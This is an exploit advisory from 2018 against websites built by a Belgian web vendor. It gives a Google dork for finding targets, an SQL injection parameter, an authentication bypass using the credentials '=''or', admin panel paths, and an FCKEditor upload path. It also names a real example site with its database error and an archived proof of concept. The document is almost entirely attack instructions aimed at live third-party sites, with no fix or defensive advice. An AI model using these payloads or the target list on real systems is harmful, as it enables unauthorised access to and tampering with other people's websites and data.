#################################################################################################

# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork  : 

intext:Copyright © 2011 - 2018 Webutation site:be

© Webutation 2018

# SQL Injection Exploit => 

/activiteit.php?id=[SQL Inj]

# Admin Panel Login Path => 

/admin/login.php

# Admin Login Bypass Exploit : 

Username : '=''or'

Password : '=''or'

# Useable Admin Panel Control URL Links => 

/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php

# FCKEditor Filemanager Exploit =>    

TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html

TARGET/yourfilenamehere.txt

#################################################################################################

# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ

# Example Site for SQL Inj =>  tgeverke.be/activiteit.php?id=465%27

# SQL Database Error => 

FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################